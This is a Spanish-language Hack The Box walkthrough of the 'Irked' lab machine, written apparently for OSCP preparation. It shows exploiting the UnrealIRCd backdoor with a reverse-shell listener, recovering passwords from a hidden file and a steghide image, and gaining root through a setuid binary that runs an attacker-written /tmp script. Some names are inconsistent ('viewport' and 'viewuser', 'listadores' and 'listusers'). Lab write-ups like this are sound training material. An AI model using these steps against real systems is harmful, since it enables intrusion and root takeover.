Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.

En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.

¡Empecemos con la diversión!

Irked

Initial Foothold

Después de enumerar todos los puertos vemos que hay un servidor IRC: unrealIRCd. No conocemos la versión, pero aún podemos intentar explotarla. Hay una puerta trasera para la versión 3.2.8.1. Podemos usar este script para explotarlo:

1. Dentro del script, establece la IP y el puerto local.
2. Configurar el receptor: ncat -lnvp 6969.
3. Lanza el exploit: python3 exploit.py 10.10.10.117 6697 -payload python.

Obtenemos un shell como ircd.

User

Podemos mirar en /home/ircd/.bash_history (truncated output):

cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

Un archivo llamado backup, muy sospechoso. Lo encontré, home/djmardov/Documents/.backup:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Tenemos una contraseña: UPupDOWNdownLRlrBAbaSSss. Ya que dice steg, creo que será steghide la contraseña de la imagen que se encuentra en el sitio web.

Tenía razón:

1. Descargar imagen: Obtener http://10.10.10.117/irked.jpg.
2. Extraer el archivo oculto: steghide extract -sf irked.jpg.

Obtenemos un archivo llamado pass.txt con el siguiente contenido: Kab6h+m+bbp2J:HG, que parece una contraseña. Podemos usarla para SSH como usuario jmardov: ssh djmardov@10.10.10.117

Root

Hay un archivo sospechoso de setuid: usr/bin/viewuser. Al ejecutarlo, busca un archivo llamado tmp/listadores.

Si creamos el archivo, se queja de este error: sh: 1: /tmp/listusers: Permiso denegado'. Parece que está tratando de ejecutar el archivo con bin/sh.

Así que, si escribimos las siguientes líneas en el archivo /tmp/listusers:

#!/bin/bash
bash

Entonces haz chmod +x /tmp/listusers y ejecuta el binario viewport, obtenemos una shell como root.